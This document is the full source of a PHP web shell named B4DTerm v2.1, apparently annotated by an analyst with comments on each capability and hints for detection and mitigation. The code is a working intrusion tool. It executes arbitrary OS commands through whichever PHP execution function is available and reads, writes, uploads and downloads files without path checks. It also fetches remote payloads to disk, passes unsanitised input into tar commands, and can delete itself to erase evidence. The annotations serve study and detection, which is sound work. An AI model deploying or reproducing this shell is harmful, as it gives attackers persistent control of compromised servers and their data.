Secure Terminal© Pawline

SECURE ACCESS

Authentication Required

" . (isset($error_msg) ? "

$error_msg

" : "") . "
#
ACCESS AT YOUR OWN RISK
"); } /* ANALYST NOTE: the code from here to the closing tag is a PHP web shell (named B4DTerm v2.1 in the text after the closing tag). The login gate is defined before this excerpt and is not visible here. Request parameters handled below: GET fetch and saveas; POST view_file, update_file, remote_fetch, network_info, php_info, compress_action, extract_zip, command; multipart field upload_data. These parameter names and the literal command string remove_system are usable as search terms in request captures and WAF logs. */ /* Idle timeout: once more than $session_expire (3600) seconds have passed since the access_time session value, the session is destroyed and the client is redirected back to this script. Where access_time is set is not visible in this excerpt. */ $session_expire = 3600; if (isset($_SESSION['access_time']) && (time() - $_SESSION['access_time'] > $session_expire)) { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit; } /* The browsing directory starts at getcwd() and is kept in the session between requests. */ if (!isset($_SESSION['current_path'])) $_SESSION['current_path'] = getcwd(); /* scan_directory(): returns one record (name, is_dir, size, modified) per entry of $dir, skipping the dot entries, sorted by modification time with the newest first. Returns an empty array when $dir is not a directory. */ function scan_directory($dir) { $items = []; if (is_dir($dir)) { $entries = scandir($dir); foreach ($entries as $entry) { if ($entry != '.' && $entry != '..') { $full_path = $dir . '/' . $entry; $items[] = [ 'name' => $entry, 'is_dir' => is_dir($full_path), 'size' => is_file($full_path) ? filesize($full_path) : 0, 'modified' => filemtime($full_path) ]; } } } usort($items, function($a, $b) { return $b['modified'] - $a['modified']; }); return $items; } /* generate_path(): builds breadcrumb output from a path, HTML-escaping each segment, and returns a single slash when the first segment is empty. NOTE(review): the empty string literals were presumably HTML markup lost when this page was extracted. */ function generate_path($path) { $segments = explode('/', trim($path, '/')); $output = ''; if (empty($segments[0])) { return '/'; } foreach ($segments as $idx => $segment) { if ($segment === '') continue; if ($idx > 0) { $output .= ''; } if ($idx === 0 && $segment === 'home') { $output .= ''; $output .= ''; $output .= '' . htmlspecialchars($segment) . ''; $output .= ''; } else { $output .= '' . htmlspecialchars($segment) . ''; } } return $output; } /* format_file_size(): renders a byte count as GB, MB or KB with two decimals (1024-based thresholds), otherwise as a plain byte count with singular and zero forms. */ function format_file_size($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } elseif ($bytes > 1) { return $bytes . ' bytes'; } elseif ($bytes == 1) { return $bytes . ' byte'; } else { return '0 bytes'; } } /* Capability: file download. The requested name is appended to the session directory as-is, with no realpath or parent-directory check, and the saveas value is written into the Content-Disposition header unescaped. */ if (isset($_GET['fetch'])) { $target_file = $_SESSION['current_path'] . '/' . $_GET['fetch']; if (file_exists($target_file)) { $save_name = $_GET['saveas'] ?? basename($target_file); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="'.$save_name.'"'); header('Content-Length: ' . 
filesize($target_file)); readfile($target_file); exit; } } /* Capability: file read. Returns the contents of the named file as JSON; the path is built by the same unchecked concatenation onto the session directory. */ if (isset($_POST['view_file'])) { $file_path = $_SESSION['current_path'] . '/' . $_POST['view_file']; if (file_exists($file_path) && is_file($file_path)) { $file_content = file_get_contents($file_path); echo json_encode(['status' => true, 'data' => $file_content]); } else { echo json_encode(['status' => false, 'message' => 'File not found']); } exit; } /* Capability: file write. Creates or overwrites the named file with the posted data field. Detection: file-integrity monitoring on web-served directories would surface these writes. */ if (isset($_POST['update_file'])) { $file_path = $_SESSION['current_path'] . '/' . $_POST['update_file']; $new_content = $_POST['data']; if (file_put_contents($file_path, $new_content) !== false) { echo json_encode(['status' => true]); } else { echo json_encode(['status' => false, 'message' => 'Write operation failed']); } exit; } /* Capability: remote download to disk. The URL is checked only with FILTER_VALIDATE_URL, fetched with file_get_contents() and saved under the session directory. Detection: outbound requests originating from the PHP worker, followed by a new file on disk. */ if (isset($_POST['remote_fetch'])) { $remote_url = $_POST['url']; $local_name = $_POST['remote_filename'] ?? basename($remote_url); if (!filter_var($remote_url, FILTER_VALIDATE_URL)) { echo json_encode(['status' => false, 'message' => 'Invalid URL format']); exit; } $destination = $_SESSION['current_path'] . '/' . $local_name; $remote_data = @file_get_contents($remote_url); if ($remote_data !== false && file_put_contents($destination, $remote_data) !== false) { echo json_encode(['status' => true, 'path' => $destination, 'size' => strlen($remote_data)]); } else { echo json_encode(['status' => false, 'message' => 'Download failed']); } exit; } /* Capability: host reconnaissance. Returns the client address (taken from the Client-IP or X-Forwarded-For request headers when present, so the value is client-controlled), the server address and the hostname. */ if (isset($_POST['network_info'])) { $client_ip = $_SERVER['HTTP_CLIENT_IP'] ?? $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR']; $server_ip = $_SERVER['SERVER_ADDR']; $host = gethostname(); echo json_encode([ 'status' => true, 'client' => $client_ip, 'server' => $server_ip, 'hostname' => $host ]); exit; } /* Capability: configuration disclosure. Captures the phpinfo() output and returns its body as JSON. */ if (isset($_POST['php_info'])) { ob_start(); phpinfo(); $phpinfo = ob_get_clean(); // Extract only the body content preg_match('/]*>(.*?)<\/body>/is', $phpinfo, $matches); $phpinfo_body = isset($matches[1]) ? 
$matches[1] : $phpinfo; echo json_encode([ 'status' => true, 'html' => $phpinfo_body ]); exit; } /* Capability: archive create and extract. The zip and unzip actions use ZipArchive; the tar and untar actions build a tar command line from request values placed between single quotes, without escapeshellarg(), and run it with exec(). Archiving can stage many files for a single download, and extraction writes archive contents to disk. Detection: tar processes whose parent is the web server or PHP worker. */ if (isset($_POST['compress_action'])) { $action = $_POST['compress_action']; $target = $_POST['compress_target'] ?? ''; $archive_name = $_POST['archive_name'] ?? ''; $current_path = $_SESSION['current_path']; $target_path = $current_path . '/' . $target; $archive_path = $current_path . '/' . $archive_name; $response = ['status' => false, 'message' => '']; if ($action === 'zip') { if (!class_exists('ZipArchive')) { $response['message'] = 'ZipArchive extension not available'; } elseif (!file_exists($target_path)) { $response['message'] = 'Target not found'; } else { $zip = new ZipArchive(); if ($zip->open($archive_path, ZipArchive::CREATE | ZipArchive::OVERWRITE) === TRUE) { if (is_dir($target_path)) { $files = new RecursiveIteratorIterator( new RecursiveDirectoryIterator($target_path), RecursiveIteratorIterator::LEAVES_ONLY ); foreach ($files as $name => $file) { if (!$file->isDir()) { $filePath = $file->getRealPath(); $relativePath = substr($filePath, strlen($target_path) + 1); $zip->addFile($filePath, $relativePath); } } } else { $zip->addFile($target_path, basename($target_path)); } $zip->close(); $response['status'] = true; $response['message'] = "Archive created: " . basename($archive_path); $response['path'] = $archive_path; } else { $response['message'] = 'Failed to create archive'; } } } elseif ($action === 'unzip') { if (!class_exists('ZipArchive')) { $response['message'] = 'ZipArchive extension not available'; } elseif (!file_exists($target_path)) { $response['message'] = 'Archive not found'; } elseif (strtolower(pathinfo($target_path, PATHINFO_EXTENSION)) !== 'zip') { $response['message'] = 'File is not a ZIP archive'; } else { $zip = new ZipArchive(); if ($zip->open($target_path) === TRUE) { // Determine extraction path if (!empty($archive_name)) { $extract_path = $current_path . '/' . 
$archive_name; } else { // Use filename without extension as folder name $extract_path = $current_path . '/' . pathinfo($target, PATHINFO_FILENAME); } // Create extraction directory if it doesn't exist if (!is_dir($extract_path)) { if (!mkdir($extract_path, 0755, true)) { $response['message'] = 'Failed to create extraction directory'; echo json_encode($response); exit; } } // Extract all files $extracted = $zip->extractTo($extract_path); $zip->close(); if ($extracted) { $response['status'] = true; $response['message'] = "Extracted to: " . basename($extract_path); $response['path'] = $extract_path; $response['files_extracted'] = true; } else { $response['message'] = 'Failed to extract archive (no files extracted)'; } } else { $response['message'] = 'Failed to open archive (invalid or corrupted ZIP)'; } } } elseif ($action === 'tar') { if (!file_exists($target_path)) { $response['message'] = 'Target not found'; } else { $compress_cmd = is_dir($target_path) ? '-czf' : '-czf'; $cmd = "tar $compress_cmd '$archive_path' '$target' 2>&1"; chdir($current_path); exec($cmd, $output, $return_code); if ($return_code === 0 && file_exists($archive_path)) { $response['status'] = true; $response['message'] = "TAR archive created: " . basename($archive_path); $response['path'] = $archive_path; } else { $response['message'] = 'TAR command failed: ' . implode("\n", $output); } } } elseif ($action === 'untar') { if (!file_exists($target_path)) { $response['message'] = 'Archive not found'; } elseif (!preg_match('/\.(tar\.gz|tgz|tar)$/i', $target)) { $response['message'] = 'File is not a TAR archive (.tar.gz, .tgz, .tar)'; } else { $extract_path = $current_path; if (!empty($archive_name)) { $extract_path .= '/' . 
$archive_name; if (!is_dir($extract_path)) { mkdir($extract_path, 0755, true); } } $cmd = "tar -xzf '$target' -C '$extract_path' 2>&1"; chdir($current_path); exec($cmd, $output, $return_code); if ($return_code === 0) { $response['status'] = true; $response['message'] = "TAR archive extracted to: " . basename($extract_path); $response['path'] = $extract_path; } else { $response['message'] = 'TAR extract failed: ' . implode("\n", $output); } } } echo json_encode($response); exit; } // Standalone zip extract function (optional) if (isset($_POST['extract_zip'])) { $zip_file = $_POST['zip_file'] ?? ''; $extract_to = $_POST['extract_to'] ?? ''; $current_path = $_SESSION['current_path']; $zip_path = $current_path . '/' . $zip_file; $response = ['status' => false, 'message' => '']; if (!class_exists('ZipArchive')) { $response['message'] = 'ZipArchive extension not available'; } elseif (!file_exists($zip_path)) { $response['message'] = 'ZIP file not found'; } elseif (strtolower(pathinfo($zip_path, PATHINFO_EXTENSION)) !== 'zip') { $response['message'] = 'File is not a ZIP archive'; } else { $zip = new ZipArchive(); if ($zip->open($zip_path) === TRUE) { // Determine extraction directory if (empty($extract_to)) { $extract_to = pathinfo($zip_file, PATHINFO_FILENAME); } $extract_path = $current_path . '/' . $extract_to; // Create extraction directory if (!is_dir($extract_path)) { if (!mkdir($extract_path, 0755, true)) { $response['message'] = 'Failed to create extraction directory'; echo json_encode($response); exit; } } // Count total files for progress (optional) $fileCount = $zip->numFiles; // Extract all files if ($zip->extractTo($extract_path)) { $zip->close(); // Verify extraction by checking if any files were extracted $extracted_files = glob($extract_path . '/*'); if (count($extracted_files) > 0) { $response['status'] = true; $response['message'] = "Successfully extracted {$fileCount} files to: " . 
basename($extract_path); $response['path'] = $extract_path; $response['file_count'] = $fileCount; } else { $response['message'] = 'Archive extracted but no files found (might be empty)'; } } else { $zip->close(); $response['message'] = 'Failed to extract files from archive'; } } else { $response['message'] = 'Cannot open ZIP file (may be corrupted or invalid format)'; } } echo json_encode($response); exit; } /* detect_capabilities(): tries shell_exec, exec, passthru, system, popen and proc_open in shuffled order, running an echo of the md5 of the current time through each and comparing the output; returns the first function name whose output matches, or the string disabled. Detection: the PHP worker spawning a shell that echoes a 32-character hex string. Mitigation: with all six functions listed in the php.ini disable_functions directive, this probe returns disabled and the command endpoint executes nothing. */ function detect_capabilities() { $execution_methods = [ 'shell_exec', 'exec', 'passthru', 'system', 'popen', 'proc_open' ]; shuffle($execution_methods); foreach ($execution_methods as $method) { if (function_exists($method)) { if ($method === 'shell_exec') { $test = @shell_exec('echo ' . md5(time())); if ($test !== false && trim($test) === md5(time())) { return $method; } } elseif ($method === 'exec') { $output = null; $result = @exec('echo ' . md5(time()), $output); if ($result !== false && isset($output[0]) && $output[0] === md5(time())) { return $method; } } elseif ($method === 'passthru') { ob_start(); @passthru('echo ' . md5(time()), $return_code); $output = ob_get_clean(); if (trim($output) === md5(time())) { return $method; } } elseif ($method === 'system') { ob_start(); $result = @system('echo ' . md5(time()), $return_code); $output = ob_get_clean(); if ($result !== false && trim($output) === md5(time())) { return $method; } } elseif ($method === 'popen') { $handle = @popen('echo ' . md5(time()), 'r'); if ($handle !== false) { $output = fread($handle, 1024); pclose($handle); if (trim($output) === md5(time())) { return $method; } } } elseif ($method === 'proc_open') { $descriptors = [ 0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = @proc_open('echo ' . 
md5(time()), $descriptors, $pipes); if (is_resource($process)) { $output = stream_get_contents($pipes[1]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); if (trim($output) === md5(time())) { return $method; } } } } } return 'disabled'; } /* process_instruction(): runs $instruction through whichever function detect_capabilities() returned, after changing into the session directory and appending a stderr-to-stdout redirect unless the string already contains one. Returns an array with output, method and success; success means exit status 0, except for shell_exec where it only means some output value was returned. The error-suppression operator on every call keeps PHP warnings out of the response. */ function process_instruction($instruction) { $method = detect_capabilities(); $result_output = ''; $execution_success = false; if ($method === 'disabled') { return ['output' => '', 'method' => 'disabled', 'success' => false]; } chdir($_SESSION['current_path']); if (strpos($instruction, '2>&1') === false && strpos($instruction, '2>') === false) { $instruction .= ' 2>&1'; } switch ($method) { case 'shell_exec': $result_output = @shell_exec($instruction); $execution_success = ($result_output !== false && $result_output !== null); break; case 'exec': $output_array = []; $last_line = @exec($instruction, $output_array, $return_code); $result_output = implode("\n", $output_array); $execution_success = ($return_code === 0); break; case 'passthru': ob_start(); @passthru($instruction, $return_code); $result_output = ob_get_clean(); $execution_success = ($return_code === 0); break; case 'system': ob_start(); $last_line = @system($instruction, $return_code); $result_output = ob_get_clean(); $execution_success = ($return_code === 0); break; case 'popen': $handle = @popen($instruction, 'r'); if ($handle) { while (!feof($handle)) { $result_output .= fread($handle, 4096); } $return_code = pclose($handle); $execution_success = ($return_code === 0); } else { $execution_success = false; } break; case 'proc_open': $descriptors = [ 0 => ["pipe", "r"], 1 => ["pipe", "w"], 2 => ["pipe", "w"] ]; $process = @proc_open($instruction, $descriptors, $pipes); if (is_resource($process)) { fclose($pipes[0]); $result_output = stream_get_contents($pipes[1]); $error_output = stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); $return_code = proc_close($process); if (empty($result_output) && !empty($error_output)) { 
$result_output = $error_output; } $execution_success = ($return_code === 0); } else { $execution_success = false; } break; default: $result_output = "Execution method unavailable"; $execution_success = false; } if ($result_output === false) $result_output = ''; if ($result_output === null) $result_output = ''; return [ 'output' => $result_output, 'method' => $method, 'success' => $execution_success ]; } /* Capability: OS command execution, answered as JSON. A per-session counter allows 150 requests per 60-second window. Two inputs are handled without spawning a process: the string remove_system deletes this script file with unlink(__FILE__) and destroys the session, and a cd prefix changes the directory stored in the session. Everything else goes to process_instruction(). Forensics: after remove_system the file is gone from disk, so request logs and process telemetry may be the only remaining evidence. */ if (isset($_POST['command'])) { header('Content-Type: application/json'); // Simple rate limiting if (!isset($_SESSION['command_count'])) { $_SESSION['command_count'] = 0; $_SESSION['command_time'] = time(); } $current_time = time(); if ($current_time - $_SESSION['command_time'] > 60) { $_SESSION['command_count'] = 0; $_SESSION['command_time'] = $current_time; } $_SESSION['command_count']++; if ($_SESSION['command_count'] > 150) { echo json_encode(['output' => 'Rate limit exceeded. Please wait...', 'error' => true]); exit; } $user_input = trim($_POST['command']); $response = ['output' => '', 'path' => $_SESSION['current_path'], 'method' => 'disabled', 'success' => false, 'error' => false]; if ($user_input === 'remove_system') { if (unlink(__FILE__)) { $response['output'] = "System removed successfully."; session_destroy(); } else { $response['output'] = "Removal failed."; $response['error'] = true; } echo json_encode($response); exit; } if (strpos($user_input, 'cd ') === 0) { $new_path = substr($user_input, 3); $previous_path = $_SESSION['current_path']; chdir($_SESSION['current_path']); if (@chdir($new_path)) { $updated_path = getcwd(); $_SESSION['current_path'] = $updated_path; $response['path'] = $_SESSION['current_path']; $response['output'] = "Directory changed:\n" . " From: " . $previous_path . "\n" . " To: " . $updated_path; } else { $response['output'] = "Error: Path not found - " . 
$new_path; $response['error'] = true; } echo json_encode($response); exit; } $execution_result = process_instruction($user_input); $response['output'] = $execution_result['output']; $response['method'] = $execution_result['method']; $response['success'] = $execution_result['success']; $response['error'] = !$execution_result['success']; if (empty($response['output']) && $response['success'] && !$response['error']) { $response['output'] = "✓ Command executed (no output)"; } echo json_encode($response); exit; } /* Capability: file upload. The uploaded file is moved into the session directory under the basename of the client-supplied name; no type or extension check is made. */ if (isset($_FILES['upload_data'])) { $upload_path = $_SESSION['current_path'] . '/' . basename($_FILES['upload_data']['name']); $upload_status = move_uploaded_file($_FILES['upload_data']['tmp_name'], $upload_path); echo json_encode(['status' => $upload_status, 'path' => $upload_path]); exit; } /* Computed on every non-handler request, so a plain page load also triggers the execution-function probe; presumably consumed by the page markup after the closing tag, which is not visible in this excerpt. */ $detected_method = detect_capabilities(); $directory_contents = scan_directory($_SESSION['current_path']); ?> B4DTerm v2.1 by Pawline
B4DTerminal © Pawline
Process ID:
$